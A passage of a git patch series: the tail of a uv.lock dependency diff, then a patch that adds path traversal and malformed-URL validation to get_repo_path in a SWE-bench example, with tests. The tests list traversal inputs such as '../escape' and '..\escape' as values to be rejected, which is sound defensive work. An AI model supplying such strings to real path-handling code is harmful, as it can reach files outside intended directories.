"https://files.pythonhosted.org/packages/c2/f3/7949994264e22639e40718c2daf6f6df5169bf48fb038c008a489ec53a50/greenlet-3.3.1-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:33a956fe78bbbda82bfc95e128d61129b32d66bcf0a20a1f0c08aa4839ffa951", size = 1567316, upload-time = "2026-01-23T16:04:23.316Z" }, { url = "https://files.pythonhosted.org/packages/8d/6e/d73c94d13b6465e9f7cd6231c68abde838bb22408596c05d9059830b7872/greenlet-3.3.1-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:4b065d3284be43728dd280f6f9a13990b56470b81be20375a207cdc814a983f2", size = 1636549, upload-time = "2026-01-23T15:33:48.643Z" }, @@ -2003,8 +2006,8 @@ requires-dist = [ { name = "nvidia-nat-autogen", marker = "extra == 'most'", editable = "../../../packages/nvidia_nat_autogen" }, { name = "nvidia-nat-core", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", marker = "extra == 'core'", editable = "../../../packages/nvidia_nat_core" }, - { name = "nvidia-nat-core", marker = "extra == 'most'", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", extras = ["async-endpoints"], marker = "extra == 'async-endpoints'", editable = "../../../packages/nvidia_nat_core" }, + { name = "nvidia-nat-core", extras = ["async-endpoints", "gunicorn", "pii-defense", "profiling"], marker = "extra == 'most'", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", extras = ["gunicorn"], marker = "extra == 'gunicorn'", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", extras = ["pii-defense"], marker = "extra == 'pii-defense'", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", extras = ["profiling"], marker = "extra == 'profiling'", editable = "../../../packages/nvidia_nat_core" }, From 329c7121c9f7ce86cb2a1af16264ad31aeca9b35 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Sun, 1 Feb 2026 22:03:29 -0800 Subject: [PATCH 22/22] fix(swe-bench): add input sanitization for get_repo_path - 
Validate instance_id to prevent path traversal attacks (.., /, \) - Validate repo_url to prevent IndexError from malformed URLs - Add tests for both validations Signed-off-by: Jerry Guan --- .../predict_iterative/tools/git_tool.py | 23 ++++++++++-- .../tests/test_iterative_predictor.py | 37 ++++++++++++++++++- 2 files changed, 56 insertions(+), 4 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py index d6dd49b28f..77b0bcdb87 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -79,7 +79,7 @@ async def setup_repository( self.active_repos[str(repo_path)] = context return context - async def cleanup(self): + async def cleanup(self) -> None: """Clean up all managed repositories. Removes all cloned repository directories and clears the active repos cache. @@ -87,7 +87,7 @@ async def cleanup(self): for repo_path_str in list(self.active_repos.keys()): repo_path = Path(repo_path_str) if repo_path.exists(): - shutil.rmtree(repo_path) + await asyncio.to_thread(shutil.rmtree, repo_path) self.active_repos.clear() @@ -103,15 +103,32 @@ def get_repo_path(workspace_dir: str, repo_url: str, instance_id: str | None = N Path to the repository. If instance_id is provided, returns workspace_dir/instance_id/org/repo for complete isolation. Otherwise returns workspace_dir/org/repo. + + Raises: + ValueError: If instance_id contains path traversal characters or repo_url is malformed. """ + # Sanitize instance_id to prevent path traversal attacks + if instance_id: + if ".." 
in instance_id or "/" in instance_id or "\\" in instance_id: + raise ValueError(f"Invalid instance_id: contains path traversal characters: {instance_id}") + + # Parse repo URL to extract org and repo names if "://" in repo_url: path = urlparse(repo_url).path else: # SSH form: git@host:org/repo.git path = repo_url.split(":", 1)[-1] + parts = path.strip("/").split("/") + if len(parts) < 2: + raise ValueError(f"Invalid repo_url: cannot extract org/repo from: {repo_url}") + repo_name = parts[-1].replace('.git', '') - org_name = parts[-2] # Organization name + org_name = parts[-2] + + # Validate extracted names are not empty + if not org_name or not repo_name: + raise ValueError(f"Invalid repo_url: empty org or repo name from: {repo_url}") # If instance_id is provided, create isolated workspace per instance if instance_id: diff --git a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py index 14f00cba5c..0eaeadc9d3 100644 --- a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py +++ b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py @@ -427,7 +427,42 @@ def test_ssh_url_parsing(self, tmp_path): assert "org" in str(path) assert "repo" in str(path) - assert "test-123" in str(path) + + @pytest.mark.parametrize("invalid_instance_id", [ + "../escape", + "foo/../bar", + "foo/bar", + "foo\\bar", + "..\\escape", + ]) + def test_instance_id_path_traversal_blocked(self, tmp_path, invalid_instance_id): + """Test that path traversal in instance_id is rejected.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = str(tmp_path / "workspace") + repo_url = "https://github.com/org/repo" + + with pytest.raises(ValueError) as exc_info: + get_repo_path(workspace, repo_url, instance_id=invalid_instance_id) + + assert "path traversal" in str(exc_info.value).lower() + + 
@pytest.mark.parametrize("invalid_url", [ + "not-a-url", + "https://github.com/", + "https://github.com", + "", + ]) + def test_malformed_repo_url_rejected(self, tmp_path, invalid_url): + """Test that malformed repo URLs are rejected.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = str(tmp_path / "workspace") + + with pytest.raises(ValueError) as exc_info: + get_repo_path(workspace, invalid_url) + + assert "invalid" in str(exc_info.value).lower() # =============================================================================